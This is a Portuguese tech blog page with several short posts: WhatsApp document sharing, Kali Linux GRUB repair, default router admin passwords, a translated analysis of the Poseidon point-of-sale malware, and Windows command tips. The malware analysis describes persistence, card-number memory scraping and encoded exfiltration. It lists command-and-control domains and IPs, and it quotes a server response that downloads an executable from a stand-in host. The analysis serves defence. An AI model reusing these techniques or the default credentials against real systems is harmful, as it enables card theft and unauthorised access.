quarta-feira, 2 de março de 2016

Agora já é possível enviar Documentos pelo WhatsApp

Sabemos que não é tão novidade, mas agora já está funcionando o envio de Documentos pelo o WhatsApp na aba de Anexos, é possível enviar, por enquanto, apenas documentos no formato PDF.

Lembrando que para realizar o envio ou recebimento, é preciso ter a mais nova versão do WhatsApp instalada. Disponível nas versões 2.12.453 e 2.12.289 para Android e 2.12.4 do WhatsApp para iOS. 


Essa nova versão do WhatsApp conta ainda com mais uma novidade, que é a mudança na página de Perfil dos seus contatos e grupos. Agora o status e o número do seu contato aparecem juntos no mesmo campo.

Se você ainda não recebeu a atualização do seu WhatsApp, se inscreva no programa de testes do 

WhatsApp Messenger

By às Nenhum comentário: Marcadores: ,

terça-feira, 1 de março de 2016

Kali Linux Dual Boot-Reparar GRUB com Windows 7-8-10

Se você estiver tentando instalar o Kali Linux ao lado(Dual Boot) do Windows 7, 8 ou Windows 10 e estiver com problema para instalar ou reparar o GRUB(GRand Unifield Bootloader), siga as dicas abaixo para resolver o seu problema.

Você já tinha alguma instalação do Windows 7,8 ou 10 e fez uma instalação do Kali Linux  ou instalou o Windows e ele removeu o GRUB e com isso não apareceu no gerenciador de boot a opção para você selecionar o SO que será inicializado. 

Se você estiver com esse problema, terá que seguir os passos abaixo:

1. Inicialize com a mídia(CD/DVD/Pendrive) que você utilizou para instalar o Kali e escolha o modo live;
2. Inicialize o GParted e identifique o local que o Kali foi instalado, geralmente é no sistema de arquivo ext4, no meu caso foi o SDA9;
3. Agora que você identificou o local de instalação, abra o terminal e entre com os respectivos comandos:

mount /dev/sda9 /mnt
mount --bind /dev /mnt/dev
mount --bind /dev/pts /mnt/dev/pts
mount --bind /proc /mnt/proc
mount --bind /sys /mnt/sys
chroot /mnt
grub-install /dev/sda
update-grub
exit
umount /mnt/dev/pts
umount /mnt/dev
umount /mnt/proc
umount /mnt/sys
umount /mnt

Com isso o GRUB foi restaurado. Agora você precisa inicializar mais uma vez com sua mídia do Kali em modo live, abrir o terminal e entrar com os seguintes comandos:

os-prober
update-grub
By às 4 comentários: Marcadores: , ,

sexta-feira, 26 de fevereiro de 2016

Senha roteador Motorola

Abrir o browser e entre com o seguinte endereço: http://192.168.1.1
E entre com a seguinte conta:
Usuário: admin
Senha: tvanc313
By às Nenhum comentário: Marcadores: , ,

Senha roteador Vivo

Abra o browser e entre com o seguinte endereço: http://192.168.1.1
E entre com a seguinte conta:
Usuário : admin
Senha : últimos 4 dígitos do endereço Mac do modem

By às Nenhum comentário: Marcadores: , ,

sexta-feira, 19 de fevereiro de 2016

Saiba tudo sobre o Poseidon - A Terrível Ameaça do Varejista

Recentemente um novo tipo ameaças, de codinome Poseidon, vem tirando o sono de muitos empresários no mundo afora, principalmente os responsáveis por redes de varejistas. Essa ameaça é conhecida por roubar informações nos sistemas de ponto de venda (PDV) no momento da utilização de cartões de credito.

No texto abaixo, adaptado do site blogs.cisco, você vai conhecer com mais detalhes o funcionamento do terrível Poseidon


 A Ameaça Poseidon

Quando os consumidores fazem compras de um varejista, a transação é processada através de sistemas de ponto-de-venda (PDV). Quando um cartão de crédito ou de débito, é utilizado um sistema de POS é utilizado para ler a informação armazenada na fita magnética no verso do cartão de crédito. Uma vez que esta informação é roubado a partir de um comerciante, ele pode ser codificado numa fita magnética e usado por um novo cartão. 
Existem os "mercado negro" para comprar estas informações valiosa, porque os atacantes são capazes de rentabilizar facilmente os dados do cartão de crédito roubado. Incidentes envolvendo PoS Malwares têm vindo a aumentar, afetando muitas grandes organizações, bem como estabelecimentos de mom-and-pop pequenas e ganhando um monte de atenção da mídia. A presença de grandes quantidades de informação financeira e pessoal garante que essas empresas e seus sistemas de POS de varejo permanecerá alvos atraentes.
image14

Visão geral

Há uma nova família de Malware visando sistemas de POS, infectando máquinas para pegar dados na memória com informações de cartão de crédito e enviar esses dados para servidores, também TLD principalmente os da .ru, para a colheita e provavelmente revenda. Esta nova família de Malware, que já apelidado de Poseidon, tem alguns componentes para ele, como ilustra o diagrama abaixo:
PoSeidonimage10
Em um nível alto, ele começa carregando um arquivo binário que ao ser executado tentará primeiro se manter na máquina de destino, a fim de sobreviver a uma possível reinicialização do sistema. Ao carregar ele se conectar com um servidor, que faz todo o gerenciamento das requisições, passando uma URL que contém um outro binário para baixar e executar as informações coletada. 
O binário baixado, FINDSTR , instala um keylogger e verifica a memória do dispositivo POS para sequências de números que podem ser números de cartão de crédito.Após a verificação de que os números estão em números de cartão de crédito, teclas e números de cartão de crédito são codificados e enviados para um servidor exfiltração.

Detalhes técnicos

Keylogger

O arquivo com SHA256 334079dc9fa5b06fbd68e81de903fcd4e356b4f2d0e8bbd6bdca7891786c39d4 talvez pudesse estar na origem do compromisso sistema POS. Chamamos isso de KeyLogger arquivo com base em informações de depuração encontrado no binário:

Após a execução, este arquivo se copia para tanto %SystemRoot%\system32\<filename>.exe ou %UserProfile%\<filename>.exe e adiciona entrada de registo sob HKLM (ou HKCU)\Software\Microsoft\Windows\CurrentVersion\Run .
O arquivo também abre HKCU\Software\LogMeIn Ignition e enumera as chaves para a chave de sub-conta, abre-e exclui o PasswordTicket Valor e obtém o Email Value. Também exclui árvore de registroHKCU\Software\LogMeIn Ignition\<key>\Profiles \ * .
O arquivo envia a um servidor exfiltration por postar dados para um desses URIs:
  • wondertechmy[.]com/pes/viewtopic.php
  • wondertechmy [.] ru / pes / viewtopic.php
  • wondwondnew [.] ru / pes / viewtopic.php
 O formato é de URI
uid =% I64u & ganhar =% d.% d & vers =% s
O componente Keylogger foi potencialmente usado para roubar senhas e poderia ter sido o vetor de infecção inicial.

Carregador

O carregador para o malware Poseidon PoS recebe o nome de depuração informações encontradas no binário:
PoSeidonimage08
Após a ser executado, carregador verifica para ver se ele está sendo executado com um desses dois nomes de arquivo:
  • WinHost.exe
  • WinHost32.exe
Se não estiver, ele irá certificar-se de que nenhum serviço Windows está sendo executado com o nome WinHost. Carregador vai se copiar para % SystemRoot% \ System32 \ WinHost.exe , substituindo qualquer arquivo nesse local que iria acontecer de ter o mesmo nome. Em seguida, carregador vai iniciar um serviço chamado WinHost.
PoSeidonimage13
Isto é feito para que ele permaneça em execução na memória mesmo se o usuário atual efetue logoff.Se carregador não é capaz de instalar-se como um serviço, ele vai tentar encontrar outras instâncias de si mesmo em execução na memória e finalizá-las. Posteriormente, ele vai se copiar para % UserProfile% \ WinHost32.exe e instalar a chave do Registro HKCU \ Microsoft \ Windows \ CurrentVersion \ Run \\ WinHost32 . Finalmente, ele irá criar um novo processo para executar % UserProfile% \ WinHost32.exe .
Agora que a persistência foi alcançado, carregador irá apagar-se, executando o seguinte comando:
  • cmd.exe / c del <path_to_itself> >> NUL
A instância do carregador funcionando em tentativa de memória para ler dados de configuração em % SystemRoot% \ System32 \ WinHost.exe.cfg . Este arquivo pode conter uma lista de URLs para ser adicionado a uma lista de URLs codificados já contida no carregador .
Loader então tenta entrar em contato com um dos servidores codificado C & C:
image00
  • linturefa.com
  • xablopefgr.com
  • tabidzuwek.com
  • lacdileftre.ru
  • tabidzuwek.com
  • xablopefgr.com
  • lacdileftre.ru
  • weksrubaz.ru
  • linturefa.ru
  • mifastubiv.ru
  • xablopefgr.ru
  • tabidzuwek.ru
Os endereços IP associados:
  • 151.236.11.167
  • 185.13.32.132
  • 185.13.32.48
  • Redigido a pedido da Lei Federal Enforcement
  • 31.184.192.196
  • 91.220.131.116
  • 91.220.131.87
Se um dos domínios acima resolver para um endereço IP de um HTTP POST é feita usando a seguinte string user-agent:
Mozilla / 4.0 (compatível; MSIE 8.0; Windows NT 6.1; Trident / 4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

dados POST é enviada para qualquer um:
    • <IP ADDRESS>/ldl01/viewtopic.php
    • <Endereço IP> /pes2/viewtopic.php

dados POST segue o formato:
uid =% I64u & uinfo =% s & ganhar =% d.% d & bits =% d & vers =% s & construir =% s
PoSeidonimage12
Carregador espera que a seguinte resposta do servidor C & C:
{<CommandLetter>: <ArgumentString>}
Exemplo de resposta:
  • {R:http://badguy.com/malwarefilename.exe}
  • {b:pes13n|373973303|https://01.220.131.116/ldl01/files/pes13n.exe}
PoSeidonimage04
É por buscar e executar o executável referenciado na resposta do servidor que a segunda parte da Poseidon encontra o seu caminho para o dispositivo de PoS.

fINDSTR

O carregador para o malware Poseidon PoS recebe o nome de depuração informações encontradas no binário:

image04
Um PE embutido é extraído através shellcode e execução continua com o binário incorporado. Este arquivo instala um keylogger mínima que é implementado de forma semelhante à descrição encontradaaqui . Os dados interceptados por este keylogger será posteriormente enviado para um servidor de exfiltração.
O PE, em seguida, percorre todos os processos em execução no dispositivo PoS a olhar para processos com um token de segurança não associado com o "NT AUTHORITY" nome de domínio. Ele itera através de todas as páginas de leitura / escrita dentro desses processos para informações sobre os cartões de crédito.
O malware procura somente sequências de números que começam com:
  • 6, 5, 4, com um comprimento de 16 dígitos (Discover, Visa, Mastercard)
  • 3 com um comprimento de 15 dígitos (American Express)

Em seguida, ele usa o algoritmo Luhn para verificar que os números são realmente números de cartão de crédito ou de débito, como mostrado pelo segmento de código abaixo:
PoSeidonimage02
Em seguida, a resolução de DNS é tentada para os domínios abaixo. Estes são alguns dos servidores exfiltração dados conhecidos:
  • quartlet.com
  • horticartf.com
  • kilaxuntf.ru
  • dreplicag.ru
  • fimzusoln.ru
  • wetguqan.ru
Se um dos domínios acima resolver para um endereço IP de um HTTP POST é feita usando a seguinte string user-agent:
Mozilla / 4.0 (compatível; MSIE 8.0; Windows NT 6.1; Trident / 4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
dados POST é enviada para:
<Endereço IP> /pes13/viewtopic.php
image11
Dados segue o seguinte formato:
oprat = 2 & uid =% I64u & uinfo =% s & ganhar =% d.% d & vers =% s
image12

Dados opcionais POST (dados: números de cartão de crédito, registros de dados: keylogger)
e dados = <XORed_with_0x2A_then_base64_data_unk> 
& registra = <XORed_with_0x2A_then_base64_data_unk>

números de cartão de crédito e dados keylogger é enviado para o servidor exfiltration depois de ser XORed e base64 codificado.
A resposta esperar do servidor exfiltração é:
Este mecanismo permite que o malware se atualizar, com base em comandos recebidos do servidor exfiltração.

Loader vs FINDSTR

PoSeidonimage01
Comparando uma cópia descompactada de carregador versão 11.4 a uma cópia descompactada deFINDSTR versão 7.1 com bindiff mostra que 62% da funcionalidade em ambas as amostras é o mesmo.Os atores por trás desse malware provavelmente desenvolveu algumas funcionalidades core e compilado-lo em uma biblioteca para ser utilizado por outros projetos que estão em desenvolvimento.

 COI

image09
Clique para Endpoint COI Versão
domínios
  • linturefa.com
  • xablopefgr.com
  • tabidzuwek.com
  • linturefa.ru
  • xablopefgr.ru
  • tabidzuwek.ru
  • weksrubaz.ru
  • mifastubiv.ru
  • lacdileftre.ru
  • quartlet.com
  • horticartf.com
  • kilaxuntf.ru
  • dreplicag.ru
  • fimzusoln.ru
  • wetguqan.ru
 Endereços IP:
  • 151.236.11.167
  • 185.13.32.132
  • 185.13.32.48
  • Redigido a pedido da Lei Federal Enforcement
  • 31.184.192.196
  • 91.220.131.116
  • 91.220.131.87
  • Redigido a pedido da Lei Federal Enforcement
Conclusão
Poseidon é outro no número crescente de sistemas de POS malwares Point-of-Sale segmentação que demonstram as técnicas e abordagens de autores de malware sofisticados. Atacantes vai continuar a orientar os sistemas de POS e empregam várias técnicas de ofuscação em uma tentativa de evitar a detecção. Enquanto ataques PoS continuar a proporcionar retornos, os atacantes vão continuar a investir em inovação e desenvolvimento de novas famílias de malware. Os administradores de rede terá de permanecer vigilantes e aderir às melhores práticas da indústria para garantir a cobertura e proteção contra o avanço ameaças de malware.
Regras do Snort: 33836-33852. Por favor, consulte Centro de Defesa ou FireSight console de gerenciamento para obter informações atualizadas.
Protegendo os usuários contra essas ameaças
image06
Nós encorajamos as organizações a considerar as melhores práticas de segurança, começando com uma abordagem ameaça-centric. Dado o cenário de ameaças dinâmico, defendemos essa abordagem ameaça-centric e operacionalizado que implementa proteções em toda a rede estendida - e em todo o continuum de ataque total - antes, durante e depois de um ataque. Esta abordagem está baseado em visibilidade superior, controle contínuo e proteção avançada contra ameaças em toda a rede estendida e todo o contínuo ataque


By às Nenhum comentário: Marcadores: ,

quinta-feira, 18 de fevereiro de 2016

Listar sessões dos Serviços de Área de Trabalho Remota

Para exibir as informações sobre as sessões dos Serviços de Área de Trabalho Remota, você pode utilizar o comando QWINSTA. Abaixo você pode conferir algumas das opções de linha de comando do qwinsta.

QWINSTA /SERVER:nome_do_Servidor - O servidor a ser consultado
QWINSTA /MODE - Exibe as configurações de linha atuais.
QWINSTA /FLOW - Exibe as configurações de controle de fluxo atuais.
QWINSTA /CONNECT - Exibe as configurações de conexão atuais.
QWINSTA /COUNTER - Exibe informações sobre contadores dos Serviços da Área de Trabalho Remota atual.
QWINSTA /VM - Exibe informações sobre sessões nas máquinas virtuais.
By às Nenhum comentário:

Como desabilitar reinicialização automática no Windows

Quem nunca teve o desprezar de ter seu computador reinicializado automaticamente apos uma atualização do Windows? O MS Windows quando instalar atualização pede para reinicializar o computador e se você não fizer isso, ele em algum momento vai fazer por você. 

 Nessa dica vamos lhe mostrar como desativar a reinicialização automática do Windows.

 1. Abrir o Regedit, no menu Iniciar pesquise por "Regedit.exe";
2. Vá para chave: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU;
3. Clicar com o lado direito do mouse na janela em braco e criar uma nova chave do tipo Valor DWORD (32 bits) com o nome NoAutoRebootWithLoggedOnUsers, vide exemplo abaixo

Com isso o Windows não será mais reinicializado automaticamente toda fez que fizer uma atualização

By às Nenhum comentário: Marcadores: ,